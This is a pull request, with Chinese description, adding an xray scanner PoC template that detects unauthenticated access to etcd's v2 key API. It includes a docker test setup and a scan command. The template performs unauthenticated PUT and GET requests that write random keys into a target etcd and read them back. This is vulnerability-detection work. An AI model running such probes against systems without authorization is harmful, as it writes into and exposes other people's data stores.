### PR TITLE
Create poc-yaml-etcd-unauth.yml

### DIFF
--- a/pocs/etcd-unauth.yml
+++ b/pocs/etcd-unauth.yml
@@ -21,7 +21,7 @@ rules:
     path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(b'{{r3}}')
+      status == 200 && body.bcontains(bytes(r3))
 
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)

--- a/pocs/etcd-unauth.yml
+++ b/pocs/etcd-unauth.yml
@@ -1,15 +1,17 @@
 name: poc-yaml-etcd-unauth
+set:
+  r1: randomLowercase(32)
 rules:
   - method: PUT
-    path: /v2/keys/56f161cf-8902-4ed0-8a46-df3b214342ae?dir=true
+    path: /v2/keys/{{r1}}?dir=true
     follow_redirects: false
     expression: |
       status == 201
   - method: GET
-    path: /v2/keys/?quorum=false&recursive=false&sorted=false
+    path: /v2/keys/{{r1}}?quorum=false&recursive=false&sorted=false
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(b'56f161cf-8902-4ed0-8a46-df3b214342ae')
+      status == 200
 
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)

--- a/pocs/etcd-unauth.yml
+++ b/pocs/etcd-unauth.yml
@@ -1,17 +1,27 @@
 name: poc-yaml-etcd-unauth
 set:
   r1: randomLowercase(32)
+  r2: randomLowercase(32)
+  r3: randomLowercase(32)
 rules:
   - method: PUT
     path: /v2/keys/{{r1}}?dir=true
     follow_redirects: false
     expression: |
       status == 201
-  - method: GET
-    path: /v2/keys/{{r1}}?quorum=false&recursive=false&sorted=false
+  - method: PUT
+    path: /v2/keys/{{r1}}/{{r2}}?prevExist=false
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: value={{r3}}
     follow_redirects: false
     expression: |
-      status == 200
+      status == 201
+  - method: GET
+    path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false
+    follow_redirects: false
+    expression: |
+      status == 200 && body.bcontains(b'{{r3}}')
 
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)

--- a/pocs/poc-yaml-etcd-unauth.yml
+++ b/pocs/poc-yaml-etcd-unauth.yml
@@ -1,0 +1,17 @@
+name: poc-yaml-etcd-unauth
+rules:
+  - method: PUT
+    path: /v2/keys/56f161cf-8902-4ed0-8a46-df3b214342ae?dir=true
+    follow_redirects: false
+    expression: |
+      status == 201
+  - method: GET
+    path: /v2/keys/?quorum=false&recursive=false&sorted=false
+    follow_redirects: false
+    expression: |
+      status == 200 && body.bcontains(b'56f161cf-8902-4ed0-8a46-df3b214342ae')
+
+detail:
+  author: j4ckzh0u(https://github.com/j4ckzh0u)
+  links:
+    - https://www.freebuf.com/news/196993.html


### PR DESCRIPTION
etcd未授权访问poc
----------

## 本 poc 是检测etcd由于默认配置，导致的未授权访问

## 测试环境
无线上环境，可以使用如下命令启动本地测试环境
```
docker run \
  -p 2379:2379 \
  -p 2380:2380 \
  --name etcd-v3.3.15 \
  mirrorgooglecontainers/etcd-amd64:3.3.15 \
  /usr/local/bin/etcd \
  --name s1 \
  --data-dir /etcd-data \
  --listen-client-urls http://0.0.0.0:2379 \
  --advertise-client-urls http://0.0.0.0:2379 \
  --listen-peer-urls http://0.0.0.0:2380 \
  --initial-advertise-peer-urls http://0.0.0.0:2380 \
  --initial-cluster s1=http://0.0.0.0:2380 \
  --initial-cluster-token tkn \
  --initial-cluster-state new \
  --debug
```
测试命令：
`xray_windows_amd64.exe webscan --plugins phantasm --poc poc-yaml-etcd-unauth.yml --url http://192.168.x.x:2379`
